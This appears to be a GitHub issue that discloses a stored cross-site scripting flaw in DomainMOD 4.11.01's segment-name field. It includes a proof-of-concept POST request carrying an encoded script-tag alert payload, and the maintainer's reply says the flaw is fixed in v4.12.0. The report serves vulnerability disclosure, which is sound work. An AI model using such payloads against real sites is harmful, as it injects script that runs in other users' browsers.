Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Stored XSS vulnerability in Segment Name #80

Closed
xrand3r opened this issue Nov 20, 2018 · 1 comment
Closed

Stored XSS vulnerability in Segment Name #80

xrand3r opened this issue Nov 20, 2018 · 1 comment
Assignees
@chetcuti

Comments

@xrand3r
Copy link

xrand3r commented Nov 20, 2018

Stored XSS vulnerability in Version 4.11.01 which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page.

Poc: Segment Name
POST http://127.0.0.1/domainmod/segments/add.php

Request Body:
new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=testing.test.com&new_description=test&new_notes=test

domainmod_xss
@chetcuti chetcuti self-assigned this Feb 3, 2019
@chetcuti
Copy link
Member

chetcuti commented Feb 3, 2019

This was fixed in v4.12.0, which was released today.

Thanks for the report!

@chetcuti chetcuti closed this as completed Feb 3, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@chetcuti chetcuti

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@chetcuti @xrand3r